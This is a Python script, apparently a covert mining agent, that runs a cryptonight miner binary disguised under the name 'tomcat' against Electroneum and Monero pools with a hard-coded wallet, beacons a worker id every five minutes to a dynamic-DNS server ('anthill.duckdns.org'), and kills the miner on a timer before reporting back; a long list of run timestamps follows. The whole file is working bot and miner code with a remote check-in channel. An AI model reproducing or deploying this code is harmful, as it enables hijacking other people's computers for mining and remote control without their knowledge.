import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:20:07.060409
#2018-02-17 17:09:04.641107
#2018-02-17 18:57:07.275500
#2018-02-17 20:45:06.003153
#2018-02-17 22:32:06.260762
#2018-02-18 00:16:05.590295
#2018-02-18 02:07:05.934868
#2018-02-18 03:53:04.800306
#2018-02-18 05:39:05.130968
#2018-02-18 07:32:07.399834
#2018-02-18 09:20:07.276591
#2018-02-18 11:06:04.083608
#2018-02-18 12:52:07.490875
#2018-02-18 14:38:06.602002
#2018-02-18 16:27:05.834237
#2018-02-18 18:16:06.140658
#2018-02-18 20:03:04.610805
#2018-02-18 21:50:08.212701
#2018-02-18 23:39:01.831455
#2018-02-19 01:24:06.498656
#2018-02-19 03:12:04.786099
#2018-02-19 04:57:03.848541
#2018-02-19 06:42:04.970801
#2018-02-19 08:32:04.353341
#2018-02-19 10:21:06.569175
#2018-02-19 12:09:01.685930
#2018-02-19 13:56:06.685541
#2018-02-19 15:45:04.037992
#2018-02-19 17:34:04.218298
#2018-02-19 19:22:01.532116
#2018-02-19 21:10:04.225170
#2018-02-19 22:56:08.031473
#2018-02-20 00:41:07.025702
#2018-02-20 02:31:07.481794
#2018-02-20 04:20:07.944504
#2018-02-20 06:05:06.927515
#2018-02-20 07:50:04.952000
#2018-02-20 09:35:04.026436
#2018-02-20 11:19:01.234076
#2018-02-20 13:06:04.958290
#2018-02-20 14:49:05.276402
#2018-02-20 16:31:08.784523
#2018-02-20 18:18:01.296848
#2018-02-20 20:09:06.743389
#2018-02-20 21:56:04.276705
#2018-02-20 23:37:03.647624
#2018-02-21 01:22:05.280365
#2018-02-21 03:12:01.840352
#2018-02-21 04:59:03.956694
#2018-02-21 06:47:04.217437
#2018-02-21 08:34:05.728542
#2018-02-21 10:19:01.400349
#2018-02-21 12:06:07.664549
#2018-02-21 13:56:09.200225
#2018-02-21 15:42:10.304620
#2018-02-21 17:34:02.230800
#2018-02-21 19:20:09.689463
#2018-02-21 21:08:05.042228
#2018-02-21 22:55:06.250628
#2018-02-22 00:37:01.347511
#2018-02-22 02:24:04.055533
#2018-02-22 04:11:01.943893
#2018-02-22 05:55:07.807086
#2018-02-22 07:43:02.054369
#2018-02-22 09:31:08.468093
#2018-02-22 11:16:10.387026
#2018-02-22 13:01:01.447421
#2018-02-22 14:48:05.056326
#2018-02-22 16:34:01.415990
#2018-02-22 18:19:07.429103
#2018-02-22 20:09:08.212049
#2018-02-22 21:56:08.428237
#2018-02-22 23:43:10.255273
#2018-02-23 01:31:02.127439
#2018-02-23 03:19:01.743082
#2018-02-23 05:04:05.443869
#2018-02-23 06:48:07.268912
#2018-02-23 08:38:07.447925
#2018-02-23 10:53:03.776554
#2018-02-23 12:49:09.661717
#2018-02-23 14:34:08.068031
#2018-02-23 16:25:07.345972
#2018-02-23 18:11:04.119438
#2018-02-23 19:56:06.753005
#2018-02-23 21:41:07.601190
#2018-02-23 23:35:06.985677
#2018-02-24 01:23:02.188155
#2018-02-24 03:13:05.309053
#2018-02-24 04:58:04.230297
#2018-02-24 06:48:04.400995
#2018-02-24 08:39:05.216299
#2018-02-24 10:23:01.412106
#2018-02-24 12:18:07.459139
#2018-02-24 14:10:08.922855
#2018-02-24 15:57:06.889051
#2018-02-24 17:51:01.790138
#2018-02-24 19:38:05.795911
#2018-02-24 21:25:07.034267
#2018-02-25 00:06:07.289101
#2018-02-25 03:19:06.125653
#2018-02-25 06:48:06.840661